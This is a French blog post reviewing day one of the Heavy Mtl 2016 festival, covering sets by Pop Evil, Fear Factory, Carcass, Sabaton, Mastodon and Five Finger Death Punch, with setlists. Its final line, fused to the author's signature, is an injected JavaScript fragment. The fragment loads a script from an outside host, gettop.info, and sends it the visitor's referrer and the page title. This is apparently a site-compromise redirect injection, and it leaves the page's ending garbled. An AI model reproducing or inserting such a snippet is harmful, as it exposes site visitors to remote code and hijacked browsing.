Bonjour à tous !

Samedi dernier, soit  le 6 Août, marquait enfin la fin de semaine tant attendue du Heavy Mtl. Comme à chaque année ou presque, c’est quasiment rendu une tradition pour moi et mes amis de se réunir à cet endroit et d’avoir du fun en masse tout en ayant des bands de fou devant nous. Cette année ne faisait pas exception à la règle car la plupart des bands qui étaient présents cette année étaient des bands que nous avions tous hâte de voir. En quelques mots, je vais vous faire quelques descriptions rapides des quelques spectacles que j’ai vus. Allons-y sans plus tarder et embarquons ensemble dans la frénésie du Heavy Mtl.

** À noter que j’ai passé ma fin de semaine accosté à la première rangée de la scène principale Molson Canadian, donc les critiques que je vous ferai porterons essentiellement sur les spectacles présentés sur celle-ci**

Pop Evil : Quand j’ai vu que ce band avait été ajouté à la programmation du festival, j’étais plus que content car j’avais déjà vu le band en première partie de Papa Roach il y a quelques temps déjà, et j’avais beaucoup aimé leur présentation. Encore cette fin de semaine, le groupe ne m’a carrément pas déçu. Les musiciens étaient en forme et leur matériel était très juste et sonnait excessivement bien. Le chanteur, qui est une vrai bête de scène, a tout fait pour faire lever la foule, sous une chaleur accablante, mais la chose qui a vraiment fonctionné est quand il a descendu sur le parterre, qu’il  a passer par-dessus les barrières et a  littéralement embarquer debout SUR la foule pour chanter, et ce des deux côtés de l’allée centrale.  Le set présenté était court, mais très efficace. Pop Evil a très bien commencé la journée sur la scène Molson et ils ont surement conquis de nouveaux fans. Voici à quoi ressemblait la setlist présenté :
– Deal With The Devil
– Lux
– Ways to Get High
– Take It All
– In Disarray
– Trenches
– Footsteps

Fear Factory : J’avais hâte de voir pour la première fois ce groupe  qui existe depuis fort longtemps. La foule scandait le nom du band même avant son arrivé sur scène, ce qui prouve que la foule montréalaise avait hâte de revoir le groupe. C’est avec force et puissance que Fear Factory est entré sur scène et c’est sans hésité que la foule c’est déchaînée. Circle Pits et Mosh Pit étaient au rendez-vous. Les musiciens semblaient tous en pleine forme et semblaient tous contents de performer pour le Heavy Mtl. Une très bonne prestation pour les amateurs du band et même les nouveaux fans comme moi. Voici la setlist présentée :
– Demanufacture
– Self Bias Resistor
– Zero Signal
– Replica
– New Breed
– Body Hammer
– Flashpoint
– H-K (Hunter-Killer)
– Pisschrist
– Shock

Carcass : Encore une fois, c’était la première fois que je voyais le groupe culte de death metal Carcass. Oui même si le band existe depuis plusieurs années, je n’avais jamais eu la chance de les voir et après avoir vu la performance du Heavy Mtl, je regrette de ne pas les avoirs connus avant. Encore une fois, la panoplie d’adeptes du band était au rendez-vous et ce même plusieurs minutes avant que le set débute. Carcass se faisait scandé par la foule et dès qu’ils ont mit le pied sur scène, la foule c’est encore une fois activée à son maximum offrant ainsi un accueil chaleureux au band. Tous les musiciens étaient à la hauteur et ont exécutés les différents morceaux avec brillo. J’ai bien aimé la prestation mais il m’est impossible de dire si elle était bonne par rapport à une autre étant donné que c’était ma première fois. Par contre, j’ai plus aimé cette prestation que celle de Fear Factory.  Je n’hésiterai pas à les revoir quand ils reviendront dans le coin ça c’est garantie.

Sabaton : Parlons maintenant d’une des meilleures prestations de la fin de semaine. Oui Sabaton est venu souvent dans le coin au courant des dernières années, mais les fans ne se tannent jamais et la prestation offerte au Heavy Mtl dépasse toutes attentes. Première chose que tout le monde a remarquée lors de ce set, est qu’il y avait un tank sur scène. OUI OUI un tank, qui supportait le drum. Il y avait même des matériaux de pyrotechnie à l’intérieur du canon du tank. Oui ce n’est qu’un accessoire de scène mais dieu que c’est impressionnant quand même et ce tank faisait beaucoup parler dans la foule. Comme à l’habitude, le band était plus qu’énergique et les musiciens étaient tous synchronisé au quart de tour, comme quoi leur spectacle est plus que rodé au fil du temps. Joakim, le chanteur et leader du groupe, semblait plus qu’heureux d’être là et de la réaction de la foule. N’allez pas croire que c’était un jeu d’acteur car on pouvait tous voir qu’il n’en revenait pas de l’accueil reçus et ça faisait plaisir à voir. Le set a aussi été supporté par plusieurs pyrotechnies donnant ainsi un autre point bonus au band. Joakim a aussi interagis souvent avec la foule, mais surtout avec Maya, une petite fille d’environs 10 ans qui était en première rangée. Joakim fût agréablement surpris de son jeune âge, mais il fût encore plus estomaqué quand il à sût que c’était son 3e spectacle rock/métal dans sa jeune vie. Il lui a même donné ses lunettes de soleil et la foule c’est ensuite mise à scander le nom de Maya. Pour avoir récolté plusieurs commentaires dans la foule, le set de Sabaton fût l’une des prestations des plus aimées de la fin de semaine. Voici à quoi ressemblait le setlist présenté :
– Ghost Division
– Carolus Rex
– Swedish Pagans
– The Lost Battalion
– To Hell and Back
– Resist and Bite
– The Art of War
– Night Witches
– Primo Victoria
– Metal Crüe
** À noter que même après que le band ai quitté la scène et que l’autre spectacle ai commencé sur l’autre scène, la foule a restée au même endroit et continuait de fredonner les HO HO HO de la chanson Swedish Pagans, démontrant ainsi l’appréciation de la prestation**

Mastodon : Le groupe Américain n’en était pas à sa première visite au festival et pour avoir assisté à toutes les fois où ils sont venus, ils attirent de plus en plus de gens lors de leur prestation. C’est avec puissance et précision que le band a présenté son matériel de type ‘’progressif/sludge/metal’’ au plus grands plaisir des fans qui étaient présents en quantité industrielle. Le son pour ce set était un peu moins bon que ces prédécesseurs, mais ça n’a rien enlevé à la qualité du set présenté. Chaque musicien avait son style différent et on peut même donner une mention spéciale au guitariste Brend Hinds, qui abordait fièrement de longs cheveux bouclés, avec une énorme barbe et portant également un accoutrement blanc un peu à la Elvis, c’était de toute beauté (HaHaHa).  Par contre, à voir la quantité de gens qu’il y avait, je m’attendais à ce que la foule soit plus déchaînée et plus bruyante que ce qu’elle était. Ce fût donc un passage réussi pour le groupe. Voici à quoi ressemblait la setlist présentée :
– Tread Lightly
– Feast Your Eyes
– Blasteroid
– Oblivion
– The Motherload
– High Road
– Ember City
– The Wolf Is Loose
– Crystal Skull
– Divinations
– Blood and Thunder

 

Five Finger Death Punch :
Malgré la rage et la déception qui habitaient certains festivaliers, de voir Five Finger Death Punch comme l’une des têtes d’affiches du festival, il y avait quand même beaucoup de gens présents pour le spectacle. Il y avait des fans finis, peignés et maquillés à l’effigie du band, et beaucoup de gens portaient fièrement des t-shirts avec le logo du groupe. Dès que le set de Nightwish à terminé, une intro verbal/musical c’est fait retentir, sous les cris stridents de la foule, et par la suite les membres du band on fait leur apparition et on directement enchaînés avec ‘’Lift Me Up’’. Le son était un peu inégal au début, mais c’est rapidement ajusté pour pouvoir mieux entendre la voix et les différents instruments sans trop se donner de la tête.  Les musiciens semblaient tous en forme et ont performés comme ils le devaient. Au travers du set, il s’est passé quelques moments cocasses comme la fois que la petite Maya, qu’on a parlé tout à l’heure lors de la critique de Sabaton, a été invitée par Ivan à monter sur scène avec sa mère. Par la suite il a fait monter 2 ou 3 autres enfants et ce, avec leurs parents, pour continuer de regarder le spectacle d’un meilleur point de vue, soit sur le côté de la scène. Autre chose, avec la chaleur accablante de la journée, le boisé entourant la scène et les gros projecteurs sur la scène, une armée d’insecte faisait rage sur scène et Ivan ne s’est pas gêné pour en faire part. Il a même offert des bières à tous ceux qui viendraient tuer les insectes pour lui (il rigolait bien sûr).

Pour avoir vu le band performer deux autres fois dans le passé, toujours dans le cadre du Heavy Mtl, ce fût selon moi la meilleure prestation jusqu’à maintenant. Je déplore seulement qu’une chose, et ce n’est pas la faute du band. À la fin du set, quand même beaucoup de temps avant la fin prévue du spectacle, Ivan nous à fait savoir qu’ils auraient aimés continuer, mais les technicien de scène et l’organisation du festival leur disait d’arrêter et que c’était terminé. J’ai trouvé dommage le fait qu’un artiste de cette envergure se fasse interdire de continuer quand ça lui tente. Je peux bien croire qu’Ils ont surement leur raisons de couper la prestation, mais c’est très très décevant.

Voici la setlist présentée :
– Lift Me Up
– Hard to See
– Never Enought
– Bad Company
– Jekyll and Hyde
– Burn MF
– Wrong Side of Heaven
– Battle Born
– Coming Down
– Got Your Six
– Under and Over it
– The Bleeding

Pour conclure, ce fût une très belle première journée dans  le cadre du Heavy Mtl. De bons bands, des fans énergiques à fond, de la bière, de belles filles, de la bonne bouffe, un son plus qu’acceptable, que demander de mieux pour débuter une fin de semaine.

Dans un prochain article à paraître, je vous parlerai de la 2e journée du festival, mais aussi des points positifs et négatifs du Heavy Mtl de cette année, qui a changé de formule, mais aussi d’emplacement.

Nous verrons ça plus tard.

D’ici là, je vous souhaite une excellente journée.

Rock On !

Christopher Drouin.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;